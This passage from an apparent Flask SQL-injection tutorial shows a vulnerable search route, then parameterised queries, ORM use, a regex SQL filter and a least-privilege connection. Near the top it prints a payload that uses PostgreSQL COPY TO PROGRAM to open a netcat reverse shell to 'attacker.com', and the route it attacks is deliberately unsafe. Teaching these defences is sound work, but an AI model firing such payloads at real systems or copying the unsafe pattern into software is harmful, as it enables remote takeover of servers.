request.args.get('q') # DANGER: Direct interpolation sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'" return execute_query(sql) # ATTACK PAYLOAD: # /search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; -- ``` ## **SECURE MITIGATION STRATEGIES** ```python from flask import Flask, request, jsonify from flask_sqlalchemy import SQLAlchemy from sqlalchemy import text import re app = Flask(__name__) db = SQLAlchemy(app) # ✅ SECURE: Using SQLAlchemy ORM class User(db.Model): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(80), unique=True, nullable=False) email = db.Column(db.String(120), unique=True, nullable=False) @app.route('/user/<int:user_id>') def get_user_secure(user_id): # ✅ SECURE: ORM prevents injection user = User.query.filter_by(id=user_id).first() if user: return jsonify({ 'id': user.id, 'username': user.username, 'email': user.email }) return jsonify({'error': 'User not found'}), 404 # ✅ SECURE: Parameterized queries for complex operations @app.route('/search') def search_secure(): query = request.args.get('q', '') # Input validation if not re.match(r'^[a-zA-Z0-9\s]+$', query): return jsonify({'error': 'Invalid search query'}), 400 # Parameterized query sql = text("SELECT * FROM products WHERE name ILIKE :search_term") result = db.session.execute(sql, {'search_term': f'%{query}%'}) return jsonify([dict(row) for row in result]) # ✅ SECURE: NoSQL injection prevention (MongoDB) def authenticate_user_secure(username, password): import pymongo from bson.objectid import ObjectId # Validate input types if not isinstance(username, str) or not isinstance(password, str): return None # Escape special characters username = re.escape(username) # Use exact match queries user = db.users.find_one({ 'username': username, 'password': hash_password(password) # Always hash passwords }) return user ``` ## **ADVANCED DEFENSE MECHANISMS** ```python # Web Application Firewall (WAF) rules class SQLInjectionFilter: MALICIOUS_PATTERNS = [ r'(\b(union|select|insert|update|delete|drop|create|alter)\b)', r'(\'|\"|\;|\-\-|\#)', r'(\bor\b.*\=.*\=)', r'(\bunion\b.*\bselect\b)', r'(\bexec\b|\bsystem\b|\bcmd\b)' ] @staticmethod def is_malicious(input_string): for pattern in SQLInjectionFilter.MALICIOUS_PATTERNS: if re.search(pattern, input_string.lower()): return True return False # Database connection security class SecureDBConnection: def __init__(self): self.connection_string = ( "postgresql://limited_user:secure_pass@localhost:5432/app_db" "?sslmode=require" ) def get_connection(self): # Use connection pooling and least privilege return create_engine( self.connection_string, pool_pre_ping=True, pool_recycle=300 ) ``` ``` > MISSION COMPLETE: Security vectors analyzed > DEFENSE PROTOCOLS: Activated > REMINDER: Use knowledge ethically - CTF challenges only [F1] EXPLOIT_RESEARCH [F2] DEFENSE_MATRIX [F3] CTF_MODE v3.1.42 Penetration Testing Secure Development Ethical Hacking CPU: 23% MEM: 67% NET: 1.2Mbps SECURITY_ENHANCED ``` **Remember**: These examples are for educational purposes and CTF challenges only. Always follow responsible disclosure and ethical hacking principles when discovering vulnerabilities in real systems.
|